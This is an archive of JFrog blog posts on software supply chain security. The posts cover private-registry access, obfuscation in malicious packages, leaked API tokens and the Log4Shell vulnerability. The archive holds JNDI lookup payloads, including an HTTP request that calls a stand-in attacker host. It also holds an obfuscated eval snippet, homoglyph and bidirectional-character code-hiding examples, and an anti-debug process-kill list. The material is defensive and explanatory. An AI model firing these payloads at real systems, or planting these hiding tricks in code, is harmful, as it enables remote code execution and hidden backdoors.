Xray Archives | JFrog Release Fast Or Die Mon, 08 Jul 2024 15:01:22 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.3 Prevent Inadvertent Software Supply Chain Exposures When Allowing Public Access to Private Registries https://jfrog.com/blog/prevent-inadvertent-software-supply-chain-exposures-when-allowing-public-access-to-private-registries/ Thu, 09 Feb 2023 16:38:26 +0000 https://jfrog.com/?p=109675

At JFrog, we’re serious about software supply chain security. As a CVE Numbering Authority, our JFrog Security Research team regularly discovers and discloses new malicious packages and vulnerabilities posing a threat to development organizations. We know that in order to deliver trusted software on demand, you must have a secure software supply chain — making security a priority in everything we do.

While organizations are oftentimes hyper-focused on finding CVEs, blocking malicious packages, or runtime attacks, we can’t forget about the security of the tools you use to manage and deliver your supply chains. Probably the most foundational of those tools is where you store and manage your packages, builds, binaries and artifacts — such as JFrog Artifactory. Let’s take a look at one key area that can open up your organization to software supply chain attacks if you’re not careful — allowing public access to your private registries or repositories.

Allowing public access to your private registries

The whole point of having private package repositories and registries is to ensure control over which software components are included in your software supply chain and who can access them. So why would you want to allow any random person on the internet to access your private registries?

There are many legitimate reasons a business would want to allow anonymous users to access their registries/repos:

  • Providing easy access to/download of public facing software such as libraries and SDKs
  • Collaborating with internal or external development teams who need to access the latest versions of 1st party software components
  • Allowing public access to non-sensitive information, such as documentation
  • Supporting integrations and automation with third-party applications and services
  • Contributing to open source projects

The issue with allowing public access to repos/registries arises when they’re made public accidentally or when artifacts containing sensitive information such user tokens, credentials, and keys are accidentally stored in repositories with “public” access.

Avoiding misconfigurations and accidental exposures

The good news is, whether you intend to allow public access to your registries or not, it’s fairly straightforward to keep this part of your supply chain secure. Here are four easy steps you can take to prevent inadvertently exposing yourself.

1. Double-check your security configurations

This is probably the easiest preventative measure you can do today (and should probably take a quick moment after you’re done reading this to go do it!). Third-party solutions for private registry/repos typically have configurations that allow admins to set whether a repo/registry can be accessed by users not managed under your development organization.

For example, here’s how you can double-check that you don’t accidentally have this setting turned on in Artifactory:

As an admin, login and navigate to Administration > User Management > Settings (see screenshot below for reference).

If the “Allow Anonymous Access” setting is checked, you’re opening the gate to potentially allowing access by non-logged in users to your repos.

2. Double-check your user permissions

If you do want to allow non-logged-in access to your registries, it’s probably best to double check what anonymous users can access and do with the artifacts in those repos/registries. Your solution should have robust RBAC settings, including for anonymous users.

For Artifactory you can check those permissions by navigating to Administration > User Management > Users > “anonymous” user (see screenshot below for reference).

When you click on the user you can see what permissions anonymous users are granted. In Artifactory you create permission sets and then add users/user groups to them. You can manage your permissions via the “Permissions” section under “User Management” (see documentation for more details).

A best practice we recommend is setting anonymous users to read only and clearly defining which repos they have access to.

3. Keep public and private content separate

At a bare minimum, you should establish separate repositories for artifacts that are intended to be publicly consumed. However, best practice is to not mix private content with public content within the same Artifactory instance, or whatever repository/registry solution you use. Instead, keep public and private assets on separate instances with a different set of permissions and access controls.

Clearly define who within your organization can deploy artifacts into your public-facing instance and regularly review the contents of those registries to ensure only appropriate artifacts are stored there.

These actions ensure private content doesn’t inadvertently get co-mingled with private assets and reduce the likelihood of misconfigurations.

4. Scan your public-facing registries for secrets

After you’ve double checked all your settings and permissions, and created a dedicated space to manage public content, there is an additional layer of protection you can add – leveraging a security tool to scan the contents of public-facing registries/repos for secrets. Taking this final step will help ensure you’re not exposing sensitive information via the components within the repo/registry.

If you’re using JFrog Artifactory and Xray this can be configured to occur any time an artifact is deployed to the public-facing repository and even automatically block the artifact from being deployed if secrets are detected.

Preventing misconfigurations in the first place

JFrog is serious about secure software supply chains, from the components within them to the tools used to deliver them. While allowing anonymous access to private repositories is a feature supported in Artifactory, it’s not enabled by default. Seeing that we can do even more to protect our users against misconfiguring undesired public access to repositories, we’re taking the following actions, and recommend other solution providers do the same:

  1. UI changes that make it less likely a setting was selected in error, in addition to updating the labels around these settings
  2. If a configuration is set that could impact supply chain security, admins will be alerted in plain language as to the implications, and have to verify the configuration is intended.
  3. Default settings that highly restrict what “anonymous” users – if enabled – can access and do in public-facing registries.

Now you know how to prevent inadvertently exposing private registries/repos and mitigate risk when intentionally doing so. If you’d like to learn how you can better secure your software supply chain, check out our regular Solution Engineering sessions for JFrog Artifactory or JFrog Xray where we answer your questions and share best practices to deliver trusted software with JFrog Platform.

Thanks to our colleagues at Aqua Nautilus, Aqua Security’s research team for recently highlighting this concern. 

]]>
Detecting Malicious Packages and How They Obfuscate Their Malicious Code https://jfrog.com/blog/detecting-known-and-unknown-malicious-packages-and-how-they-obfuscate-their-malicious-code/ Mon, 30 Jan 2023 15:46:50 +0000 https://jfrog.com/?p=108729

Wow! We made it to the last post in our Malicious Packages series. While parting is such sweet sorrow, we hope blogs one, two, and three provide insights into the havoc malicious packages cause throughout your DevOps and DevSecOps pipelines. 

In the prior posts:

Now let’s get to know attackers’ other, more discreet interests when creating a malicious package: hiding malicious code, and finally showing how malicious packages can be detected and prevented.

Obfuscation techniques attackers use to hide payloads in malicious packages

Besides performing a successful infection and payload execution, malicious package authors would want to avoid detecting their malicious activity.

To achieve a reasonable success rate of an attack, attackers would like to avoid detection by code analysis security tools and make it hard for security researchers to reverse engineer their malicious packages. A widespread technique for achieving these goals is using code obfuscation, which is the process of modifying an executable so that it is no longer useful to a hacker. However, it remains fully functional.

We’ll discuss several code obfuscation techniques, including off-the-shelf public obfuscators, custom obfuscation techniques, and the invisible backdoors technique, which isn’t necessarily an obfuscation method by itself, but rather a technique to invisibly change the source code logic without producing visual artifacts.

Public obfuscator example: python-obfuscator library

In July 2021, JFrog security researchers detected a malicious package called noblesse that used a public popular Python obfuscator, simply called Python obfuscation tool. The obfuscation mechanism used in this tool is a simple encoding of Python code with base64, decoding it at runtime, compiling it, and executing it.

import base64, codecs
magic = 'cHJpbnQ'
love = 'bVxuyoT'
god = 'xvIHdvc'
destiny = 'zkxVFVc'
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))

In the code snippet above, we can see an example of a Hello world print, that was obfuscated automatically with this tool. We can see the usage of base64 strings, the decoding of them with b64decode() function, and the compile() and eval() calls that execute the decoded code.

This obfuscation trick can fool a simple static analysis tool, but not a more thorough analysis tool. For example, our automatic malicious code detectors are aware of this simple obfuscation technique and flag the obfuscated code.

The control flow flattening obfuscation technique

Control flow flattening is a technique in which the code’s control flow structure breaks into blocks that are put next to each other instead of their original nested levels.

In December 2021, JFfrog security researchers detected a malicious package called discord-lofy that used a combination of several obfuscation techniques. One of them is control flow flattening. The payload in this package was a Discord token grabber, and typosquatting and trojan infection methods helped spread it.

We can look at this technique with an example from the published paper Obfuscating C++ Programs via Control Flow Flattening that explained this method with a simple example in the diagram below:

Look at the original code on the left side of the diagram; we can split it into three code blocks. First, we have variables initialization, then a while loop with a break condition, and finally, the code block inside the while loop.

You can see the code on the right side after applying the obfuscation. The three code blocks were flattened, and a switch case is used to control the flow of the code. A newly added variable swVar holds the number of the code block that’s executed. Also, at the end of each code block, its value changes to indicate the next block that should run.

Using homoglyph characters to hide malicious code

The homoglyph characters method isn’t an obfuscator by itself, but it can be used to hide malicious code modifications in legitimate software packages. This technique was published in the TrojanSource paper and demonstrates the possibility of changing source code invisibly. In other words, the logic of the code changes to contain a vulnerability or malicious code, for example, without producing any visual artifacts.

In this technique, attackers can use Unicode characters that look like standard ASCII Latin characters that an average reader would overlook. Still, the compiler or the interpreter will treat them differently, so the logic of the code changes.

Supply-chain attackers can use this technique to plant invisible backdoors into popular source code repositories. For example, an attacker might change a string literal check or a function call to make it always succeed or fail invisibly by changing one of the string’s characters to a homoglyph.

In the following code snippet example below, the two functions appear identical. However, the bottom function name uses the Cyrillic H character, which counts as a completely different function name. A code later in the program may call any of these two functions in an indistinguishable manner.

void sayHello() {
    std::cout << "Hello, World!\n";
}

void sayНello() {
    std::cout << "Bye, World!\n";
}

Using bidirectional control characters to hide malicious code

Another invisible method introduced in the TrojanSource paper was the Unicode bidirectional (or BiDi) control characters. These characters control text flow (either left-to-right or right-to-left). When using BiDi control characters in a source code, the Unicode encoding can produce strange artifacts, such as a source code line that visually appears in one way but is parsed by the compiler in another.

For example, look at this original code snippet below:

int main() {
bool isAdmin = false;
/* begin admins only */ if (isAdmin) {
    printf("You are an admin.\n");
/* end admins only */ }
return 0;
}

For the reader, the code appears not to print “You are an admin” since isAdmin = false. However, as seen in the snippet below, suppose the Unicode BiDi control character inserts in the correct position in the condition check. In that case, the compiler could interpret the condition check line as a full comment so the entire check can be bypassed.

When inserting a BiDi character in the condition check:

int main() {
bool isAdmin = false;
`/* begin admins only if (isAdmin)  */ {`
    printf("You are an admin.\n");
/* end admins only */ }
return 0;
}

Anti-Debug techniques

In addition to code obfuscations, attackers make the analysis processes of researchers and automation tools more difficult by also detecting debugging tools as part of the malicious code.

For the first time, JFrog Security researchers found and disclosed a malicious Python package called cookiezlog that used this kind of anti-debug technique. Among known obfuscation techniques like PyArmor and code compression, it was found that the package used an open source Anti-debugger for Python called Advanced-Anti-Debug.

One of the functions of this Anti-debugger called check_processes() and its purpose is to look whether a debugger process runs on the system by comparing the active process list to the list of over 50 known tools, including the following:

PROCNAMES = [
    "ProcessHacker.exe",
    "httpdebuggerui.exe",
    "wireshark.exe",
    "fiddler.exe",
    "regedit.exe",
...
]
 
for proc in psutil.process_iter():
    if proc.name() in PROCNAMES:
        proc.kill()

If any of these processes are running, the Anti-Debug code tries to kill the process via psutil.Process.kill. Read our full analysis of this Anti-debugger in our latest blog.

Now that we know the technical information of the infection, payload, obfuscation, and anti-debug techniques used in malicious packages, let’s finally discuss methods to detect malicious packages in the software development life cycle (SDLC).

How to identify known and unknown malicious packages

Detecting known malicious packages

Let’s start with detecting known malicious packages.

To get a complete picture of the malicious packages in our projects, we essentially need to list our project’s dependencies and detect all of the installed third-party software versions in our project. The artifact of this process is called the software bill of materials (SBOM), which includes information on the installed third-party software.

We can use the SBOM to query public repositories and check if the third-party software packages we use are malicious or not. If we take PyPI or npm for example, these repositories define processes in which users can report malicious packages. To check for known malicious packages, the most efficient way is to query those repositories.

Unfortunately, there are two problems when implementing this process. The first problem is that many repositories don’t save historical data. For example, in PyPI malicious packages are removed from the repository when confirmed as malicious, leaving no way to tell if a package or specific versions of it were detected as malicious in the past. Below is a screenshot of a malicious package called ecopwer we disclosed last year. As of today, there’s no evidence for this package when searching for it in PyPI:

The tracking in npm is slightly better. Reported malicious packages are replaced with dummy code and they’re tagged as a Security holding package, as you can see in this screenshot below of a malicious package called colors-art in npm:

While this is good for tracking malicious packages, it’s not useful to track specific malicious versions of legitimate packages, because all versions are removed from the repository when they’re confirmed as malicious.

The second problem is that even if we would like to use the repositories’ data to scan for malicious packages, common security auditing tools report vulnerabilities but not malicious packages. For instance, take a look at the following result of executing the PyPI tool pip-audit after the malicious package ecopower was installed. The package couldn’t be scanned (as seen below) because it was removed from PyPI repository after it was reported as malicious:

Because of these two problems and the fact that developers usually have to perform the audit process we just described in scale (i.e., as part of the SDLC), we essentially need to automate the process. This can be achieved by using a software composition analysis (SCA) tool integrated into our development and CI/CD process. It’s important to pick a security tool like JFrog Xray, that collects and stores malicious package names and versions in an internal database and doesn’t rely only on information from external repositories such as npm and PyPI, which do not save historical data as we saw.

Detecting unknown malicious packages

The detection of unknown malicious packages is considered much harder technically, because we essentially deal with unknown threats, similar to finding a zero-day in the field of vulnerabilities. To detect unknown malicious packages, we need to find a way of identifying characteristics of malicious packages before they’re known as malicious.

The approach we took when we developed JFrog Xray, isn’t just to update the Xray database with up-to-date known malicious package names and versions. But for detecting unknown malicious packages, we also develop and run heuristic scanners that scan software packages code in public repositories and detect anomalies in them. The scanners try to find evidence of malicious activity in any of the attack phases we discussed in this blog series — in the infection methods, in the payload phase, and also by detecting hiding methods or obfuscation techniques.

The ability of the scanners to provide alerts of possible unknown malicious packages makes them the foundation for all of the malicious packages we discover, research, and disclose. In this blog series, we thoroughly analyzed some of the malicious packages we discovered with this technique, as well as in other blogs we publish.

Here’s a list of scanners we developed. Keep in mind that it’s theoretically possible to develop a scanner for every phase of the attack, so try to think about this list as a list of demonstrations of heuristic techniques, this way you can think about more techniques if you’re interested in hunting unknown malicious packages.

Examples of scanners we developed:

  • For detecting the dependency confusion infection method, we developed scanners that find packages with high version numbers on remote public repositories and alert on possible impersonations.
  • For detecting Download & Execute payloads, we developed scanners that find code patterns of downloading a binary and executing it, using system functions we monitor in different languages.
  • For detecting sensitive data stealer payloads, we developed scanners that find code patterns of access to sensitive locations in the file system, using system functions we monitor in different languages.
  • For detecting obfuscation techniques, we developed scanners that alert on base64 decoding and other code characteristics of public obfuscators.

Best practices for secure development to avoid malicious packages

We’re nearing the end of the blog series, but we won’t end without giving you several best practices for secure development to deal with a malicious package security threat:

  • The most important and basic method to deal with a malicious packages threat is to use a software composition analysis tool as part of your SDLC like JFrog Xray, or another software composition analysis tool.
  • Define policies and automate actions as part of a DevSecOps process. If a malicious package is discovered in the process, it’s recommended to adopt a policy that breaks a build process and alerts the issue.
  • For preventing the dependency confusion infection method, we would like to avoid automatic fetching of a high-version malicious package, unless we perform DevOps and DevSecOps tests on a new version of our published software. To achieve this, it’s recommended to configure your build system to exclude remote repositories for internal packages and to use strict versions for external dependencies for every build.
  • Use open source tools to help detect malicious packages and prevent them from infecting your projects:
    • Jfrog-npm-tools: Open source tools JFrog developed and published to the community for npm packages security.
    • piproxy: A small proxy server JFrog developed for pip that modifies pip behavior to install external packages only if the package was not found on any internal repository. This fixes the Dependency Confusion issue in pip.
    • npm_domain_check: A tool JFrog developed that detects npm dependencies that can be hijacked with domain takeover.
    • Confused: This tool checks for dependency confusion vulnerabilities in multiple package management systems.
    • PyPI-scan: This tool checks names similarity to find typosquatting packages.
  • Pyrsia.io: A new open source initiative JFrog announced last year, for creating a secure, distributed peer-to-peer packages repository that provides integrity for software packages. The project uses blockchain technology to establish a chain of provenance for open source packages. Read more about this at pyrsia.io.

This post concludes our Malicious Packages blog series, but this isn’t a farewell.

Register for JFrog’s upcoming webinars to continue your education.

]]>
Enterprise Package Management for Everyone https://jfrog.com/blog/enterprise-package-management-for-everyone/ Tue, 25 Oct 2022 13:37:13 +0000 https://jfrog.com/?p=101871

Suppose you asked developers in the mid-2000s how they managed and compiled their binaries. You’d probably hear some anxiety-inducing answers (e.g., storing packages in git repositories or insecure file stores).

Thankfully, organizations currently have various options for managing their first or third-party packages, dependencies, and containers. Different tools offer different levels of package support and feature sets to improve your DevOps workflows, allowing organizations to decide based on the right mix of features to meet their needs. 

As part of our normal community pulse check, we polled 200 software developers, engineers, and DevOps professionals in July of 2022 to see what tools they’re using to manage their binaries and compiled source code. Here are two critical takeaways we found. 

  1. JFrog takes the lead for enterprise organizations: For Enterprise sized organizations, JFrog Artifactory was the clear leading choice for both package management and container registry, as shown in the diagrams below, with 56% and 29% respectively choosing JFrog (compared to 16% and 19% for the following popular options).
  2. SMBs use a variety of options to meet their needs: For package management, JFrog was still the favored option with 26% as seen in the diagrams below. But the distribution between used tools was much closer, with the following most popular choices having ~19% and ~14%. For container registry, JFrog came in second to AWS with 38% and 14%, respectively.

So while JFrog is the clear choice for enterprises to manage their packages and containers, smaller organizations are using a greater variety of options to meet their needs. 

Download the Complete Poll Infographic>

You don’t have to be an enterprise to get enterprise-grade quality

Enterprise-grade package management isn’t just for enterprises. 

There’s a common sentiment that you need to sacrifice when you’re at a smaller organization—either going without or selecting tools that may give more breadth of features but sacrificing the depth and completeness of those features. 

Here are just a few examples of how Artifactory can benefit smaller organizations immediately:

Improving build speed: Artifactory serves as a proxy to cache binaries from public registries to reduce latency and eliminate the possibility that a public registry is down or packages are unavailable. 

Increasing stability of CI/CD: Manage the inputs and outputs of your CI/CD pipelines in a single place that is stable, manageable, scales, and provides necessary metadata about your builds and artifacts. 

Production-ready: Serve production-ready assets to dynamic production environments from an always available, secure source. Artifactory is Kubernetes ready, providing a comprehensive, advanced container registry and Helm Chart repositories. 

And as you look to the future, here are a few ways in which adopting Artifactory lays the foundation for a constantly evolving world:

Truly Universal: The technologies you use today may not be the ones you need tomorrow. No other package manager natively supports as many package and file types as JFrog Artifactory (i.e., local, remote, virtual, HA, and replication). Nor do they offer the breadth of ecosystem support, easily integrating with the build and deployment tools you need to create and deliver software.

Cloud Flexibility: You can get started with Artifactory as an SaaS subscription in a matter of minutes, but as you grow, you might need to manage your binaries on-prem. Or you may want the freedom to take advantage of multiple public cloud providers

Artifactory delivers hybrid and multi-cloud DevOps support with the same great experience. DevOps teams have unparalleled flexibility in where they host, build, and deploy. No other repository manager provides this level of freedom to create where and how you want to.

Limitless Scale:  With JFrog Artifactory as part of the JFrog DevOps Platform, you can access and deliver your software components anywhere with total control. Set up multiple connected instances of Artifactory and leverage JFrog Distribution, Connect, and PDN to ensure seamless software delivery to the edge. 

Holistic Security: Start with basic OSS and Container vulnerability scanning. As your security needs evolve, add advanced application security capabilities without needing to add a new solution. With Artifactory as your package manager and container registry, you can quickly turn on security through Software Composition Analysis (SCA) that has been thoughtfully integrated into the binary lifecycle management process – from curation through creation to consumption – securing and managing your software assets in a single place.

By choosing JFrog for package management, you lay a trusted foundation for scalable, flexible, and future-proof DevOps. You get essential capabilities today and efficiently meet the changing needs of your organization tomorrow without needing to replace the core element of your DevOps process.

But don’t take our word for it. Try Artifactory for yourself and see how package management with JFrog can benefit your organization. 

]]>
JFrog’s Advanced Security Scanners Discovered Thousands of Publicly Exposed API Tokens – And They’re Active https://jfrog.com/blog/jas-secrets-detection-reveals-active-tokens/ Thu, 20 Oct 2022 13:51:55 +0000 https://jfrog.com/?p=101482 JFrog Advanced Security - Secrets Detection

Read our full research report on InfoWorld

The JFrog Security Research team released the findings of a recent investigation wherein they uncovered thousands of publicly exposed, active API tokens. This was accomplished while the team tested the new Secrets Detection feature in the company’s JFrog Advanced Security solution, part of JFrog Xray

The team scanned more than eight million artifacts in the most common open-source software registries: npm, PyPI, RubyGems, crates.io & DockerHub (both Dockerfiles and small Docker layers). Each artifact was analyzed using the Secrets Detection scanners to find and verify leaked API tokens. For npm and PyPI packages, the scan also included multiple versions of the same package to try and find tokens that were once available but removed in a later version.

Pie chart displaying number of artifacts that were analyzed by JFrog Secrets Detection by platform. DockerHub made up the biggest slice, with 5.78 million of the 8 million scanned artifacts.
  Analyzed artifacts per platform (in millions).


After scanning all supported token types by Secrets Detection and verifying the tokens dynamically, AWS, GCP, and Telegram, API tokens were the most leaked tokens (in that order).  Interestingly, AWS developers seemed more vigilant about revoking unused tokens, with 47% of AWS tokens found active, unlike GCP, which boasts an active token rate of ~73%.

Graph displaying data of the distribution of active/inactive tokens for repositories. AWS, GCP, and Telegram API tokens were the most-leaked tokens.
Distribution of active/inactive tokens for each repository.

 

Although the initial goal of their research was to find and fix false positives using JFrog Advanced Security, the research team uncovered more active secrets than expected, which prompted the detailed analysis. To complete the analysis, the team privately disclosed all leaked secrets to their respective code owners (ones who could be identified), offering them a chance to replace or revoke the secrets as needed.

Secrets Detection uncovered disclosed secrets in the source code, like plaintext API keys, credentials, expired certificates, or passwords, often forgotten and left exposed unintentionally. These secrets threaten software’s integrity, allowing bad actors to access confidential information, data, or private networks. 

Read the in-depth JFrog Security research findings and the five best practices they recommend for safely storing tokens in this InfoWorld article, and stay tuned for more examples of how the new features of JFrog Advanced Security can help safeguard your software supply chain. 

]]>
Log4j Vulnerability Alert: 100s of Exposed Packages Uncovered in Maven Central https://jfrog.com/blog/log4j-vulnerability-alert-100s-of-exposed-packages-uncovered-in-maven-central/ Thu, 30 Dec 2021 15:17:00 +0000 https://jfrog.com/?p=87311 Log4j Vulnerable Packages in Maven Central

The high risk associated with newly discovered vulnerabilities in the highly popular Apache Log4j library – CVE-2021-44228 (also known as Log4Shell) and CVE-2021-45046 – has led to a security frenzy of unusual scale and urgency. Developers and security teams are pressed to investigate the impact of  Log4j vulnerabilities on their software, revealing multiple technical challenges in the process.

Since Log4Shell was publicized, the JFrog Security Research team set out to help the developer community deal with the new threat as quickly and efficiently as possible. As we analyzed the issue, we found that using project dependencies to detect possible inclusions of Log4j in the code, while valuable, does not detect all instances of Log4j code in use. This means that relying solely on dependency scanning can leave vulnerable applications unnoticed. To provide additional detection capabilities, we released specialized Log4j vulnerability scanning tools designed to identify the presence and utilization of Apache Log4j in both source code and binaries.

In our recent blog post: “Log4j Detection with JFrog OSS Scanning Tools” we outlined the approach we implemented to improve Log4j vulnerability detection by scanning beyond package dependencies. The following are new findings gathered while using our new OSS tools to scan Java packages in the Maven Central repository.

The Importance of In-Depth Scanning for Log4Shell Vulnerability

The obvious (but incomplete!) way to check for exposure to Log4Shell is to see whether a vulnerable version of Log4j is listed as a dependency of a project in the build configuration (`pom.xml`, `gradle.build` etc.). A more accurate, but admittedly more time consuming approach is to check whether Log4j is included as a transitive dependency (`gradle -q dependencies` or `mvn dependency:tree`). Somewhat surprisingly, this method is also incomplete, and deeper investigation is required to make sure the final product does not contain vulnerable Log4j code.

The reason that scanning the full dependencies list may miss instances of included Log4j code is because dependencies only specify external packages needed to build or run the current artifact. If the vulnerable code is inserted directly into the codebase, it is not a dependency. Therefore, for more precise detection of vulnerable Log4j code, we need to inspect the code itself.

Log4j Inclusion In Packages – Findings in Maven Central

In previous research, approximately 17,000 Java packages in the Maven Central repository were found to contain the vulnerable log4j-core library as a direct or transitive dependency. Our investigation was focused on identifying additional packages containing the Log4j vulnerability that would not be detected through dependency scanning – namely, packages containing vulnerable Log4j code within the artifact itself.

We surveyed the latest versions of packages in Maven Central to get some sense of the numbers involved. Overall, direct inclusion of Log4j code in artifacts is not as common as the use of Log4j through dependencies. However, it still adds up to hundreds (~400) of packages which directly include Log4j code, opening these packages to Log4j vulnerabilities. In more than half of all cases (~65%), Log4j code is included as classes directly (i.e. direct inclusion / shading), in contrast to including complete Log4j .jar files (i.e. fat jar), which is typically how it is presented in the remainder of cases. These numbers indicate that tools looking for complete .jar files only will miss most of the cases where Log4j is included directly.

Another interesting metric to investigate is the number of cases where Log4j is included in the artifact, but also as a transitive dependency. There is no direct link between the two notions: code inclusion may result from the requirements of one bundled library, and another may require Log4j as an external dependency. From our observations, in ~30% of the cases where Log4j code is included directly in an artifact as classes and not a complete .jar file, it also does not show up in the transitive dependencies list of the artifact. These cases will not be found by tools that look for explicit mentions of library names in the dependency tree, or the inclusion of complete .jar files.

Recommendations

The JFrog Security Research team is recommending all developers take extra caution and carefully check whether their software products use unpatched versions of Log4j2, both in the first-party code they developed and in the third-party code used in their applications.

We recommend using automated deep scanning tools to accelerate and simplify the detection of the Log4j vulnerability while making sure all possible ways of including Log4j in the released artifacts are covered.

Want to learn more about the Log4j vulnerability and and how it affects you?

Check out these additional resources from the JFrog Security Research Team:
Log4Shell 0-Day Vulnerability: All You Need To Know – Blog
Log4j Log4Shell Vulnerability Explained – Webinar
Log4j Log4Shell Vulnerability Q&A – Blog
Log4j Detection with JFrog OSS Scanning Tools – Blog

]]>
Log4j Log4Shell 0-Day Vulnerability: All You Need To Know https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/ Tue, 28 Dec 2021 03:00:02 +0000 https://jfrog.com/?p=86007 Log4Shell Vulnerability Explained

On Thursday, Dec 9th 2021, a researcher from the Alibaba Cloud Security Team dropped a zero-day remote code execution exploit on Twitter, targeting the extremely popular log4j logging framework for Java (specifically, the 2.x branch called Log4j2). The vulnerability was originally discovered and reported to Apache by the Alibaba cloud security team on November 24th. MITRE assigned CVE-2021-44228 to this vulnerability, which has since been dubbed Log4Shell by security researchers.


JFrog Releases OSS Tools for Identifying Log4J Utilization & Risk
Get the Scanning Tools

Since December 9th, the Log4j vulnerability has been reported to be massively exploited in the wild, due to the fact that it is trivially exploitable (weaponized PoCs are available publicly) and extremely popular, and got a wide coverage on media and social networks.

In this technical blog post, we will clarify the exploitation vectors for this issue, provide accurate research-backed novel information on exactly what is vulnerable (as some reports have been inaccurate), suggest Log4j vulnerability remediations for vendors that cannot easily upgrade their log4j version and answer some burning questions that we’ve been asked on this vulnerability (such as the efficacy of some suggested mitigations floating around in the last couple of days).

Note: JFrog products are not affected, as they are not using the log4j-core package.

 

In this blog post:

Technical updates:

What causes the Log4j Log4Shell vulnerability?

Log4j2 supports by default a logging feature called “Message Lookup Substitution”. This feature enables certain special strings to be replaced, at the time of logging, by other dynamically-generated strings. For example, logging the string Running ${java:runtime} will yield an output similar to: 

Running Java version 1.7.0_67

It has been discovered that one of the lookup methods, specifically the JNDI lookup paired with the LDAP protocol, will fetch a specified Java class from a remote source and deserialize it, executing some of the class’s code in the process.

This means that if any part of a logged string can be controlled by a remote attacker, the remote attacker gains remote code execution on the application that logged the string.

The most common substitution string that takes advantage of this issue will look similar to:

${jndi:ldap://somedomain.com}

Note that the following protocols may also be used for exploiting this issue (some of them may not be available by default) –

${jndi:ldaps://somedomain.com}

${jndi:rmi://somedomain.com}

${jndi:dns://somedomain.com} (Allows detecting vulnerable servers, does not lead to code execution.)

The basic attack flow can be summarized by the following diagram:

Log4j log4shell vulnerability attack flow


Learn all about the Log4j vulneraility directly from our security research team!
Watch Log4shell on-demand Webinar

Why is Log4Shell so dangerous?

The vulnerability, which received the highest CVSS score possible – 10.0 – is extremely dangerous due to a number of factors:

  1. Exploitation of the vulnerability is trivial and persistent, with tons of weaponized exploits available on GitHub and other public sources. 
  2. Log4j2 is one of the most popular Java logging frameworks. There are currently almost 7,000 Maven artifacts that depend on log4j-core (the vulnerable artifact), and there are countless others Java projects that use it.
  3. The vulnerability can easily be used in a drive-by-attack scenario by bombarding random HTTP servers with requests similar to:

GET / HTTP/1.1

Host: somedomain.com

User-Agent: ${jndi:ldap://attacker-srv.com/foo}

Or alternatively, a specific webapp can be brute-forced by filling all available HTML input fields with the payload string, using automated tools such as XSStrike.

4. Although the vulnerability is context-dependent, since arbitrary user input must reach one of the Log4j2 logging functions (see next section), this scenario is extremely common. In most logging scenarios, part of the log message contains input from the user. Such input is rarely sanitized since it is considered to be extremely safe.

When exactly is the Log4j vulnerability exploitable?

All of the following conditions must apply in order for a specific Java application to be vulnerable:

  • The Java application uses log4j (Maven package log4j-core) version 2.0.0-2.12.1 or 2.13.0-2.14.1
    • Version 2.12.2 is not vulnerable, since it received backported fixes from 2.16.0.
  • A remote attacker can cause arbitrary strings to be logged, via one of the logging APIs – logger.info(), logger.debug(), logger.error(), logger.fatal(), logger.log(), logger.trace(), logger.warn()
  • No Log4j-specific mitigations have been applied (see the next “Mitigations” section).
  • (on some machines) The Java JRE / JDK version in use is older than the following versions:
    • 6u211
    • 7u201
    • 8u191
    • 11.0.1

This is due to the fact that later versions set the JVM property com.sun.jndi.ldap.object.trustURLCodebase to false by default, which disables JNDI loading of classes from arbitrary URL code bases.
Note that relying only on a new Java version as protection against this vulnerability is risky, since the vulnerability may still be exploited on machines that contain certain “gadget” classes in the classpath of the vulnerable application. See Appendix B – “Exploiting Log4Shell in newer Java versions.”

Are JFrog products vulnerable?

It’s important to note that JFrog Security has validated that JFrog Platform solutions themselves are not affected, as no products, including Artifactory, Xray, JFrog distribution, Insight, Access or Mission Control, are using the log4j-core package.

For avoidance of doubt, JFrog products are not affected by any of the following CVEs –

  • CVE-2021-44228
  • CVE-2021-45046
  • CVE-2021-45105
  • CVE-2021-44832

I’m using the log4j-api package, am I vulnerable?

Note that some advisories claimed the Maven package log4j-api was vulnerable to this issue. JFrog’s security research team looked into this claim and concluded that log4j-api (by itself) is not vulnerable. This is due to the lack of JndiLookup functionality, and can be easily seen by trying to trigger the vulnerable code. 

are log4j-api packag users affected by log4shell?

Running this code with only log4j-api installed yielded the following output:

ERROR StatusLogger Log4j2 could not find a logging implementation. Please add log4j-core to the classpath. Using SimpleLogger to log to the console...

When running the same code with the SimpleLogger class, the lookup string is logged verbatim, but no lookup code is triggered (since it does not exist.)

How can I completely fix the Log4j Log4shell issue?

The best fix for this issue would be to upgrade your log4j dependencies to version 2.16.0, which completely resolves the issue by disabling JNDI by default and removing support for message lookups.

Upgrading to version 2.15.0 will also completely shield default configurations from remote exploitation, although most of the mitigations added by version 2.15.0 have already been bypassed (See Appendix D). To remain future-proof we recommend upgrading to 2.16.0 as soon as possible.

Can I mitigate the Log4shell vulnerability without upgrading a version?

Although we recommend fixing the vulnerability completely by upgrading the log4j version to a fixed version, it is possible to completely mitigate the issue without upgrading:

Method 1: For log4j 2.10.0 and later versions – Disabling lookups:

Update – This mitigation method can be bypassed in rare non-default configurations, via CVE-2021-45046. See Appendix C for more information. We still recommend vendors that cannot upgrade to a newer Log4j2 version to use both this mitigation method and mitigation method 2 specified below. Mitigation method 2 (removing the vulnerable class) is not affected by CVE-2021-45046.

If using log4j 2.10.0 or any later version, we recommend disabling message lookups globally by setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true by executing this command before Java applications are loaded in one of the system’s init scripts:

export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

This can also be done system-wide by editing the /etc/environment file and adding:

LOG4J_FORMAT_MSG_NO_LOOKUPS=true

This method can be used as an additional protection layer in case you suspect not all dependencies have been properly updated, and even to protect against third-party Java packages that depend/embed a vulnerable version of and have not been properly patched yet.

Alternatively, lookups can be disabled for a specific invocation of the JVM by adding the following command-line flag when running the vulnerable Java application: ‐Dlog4j2.formatMsgNoLookups=True

For example –

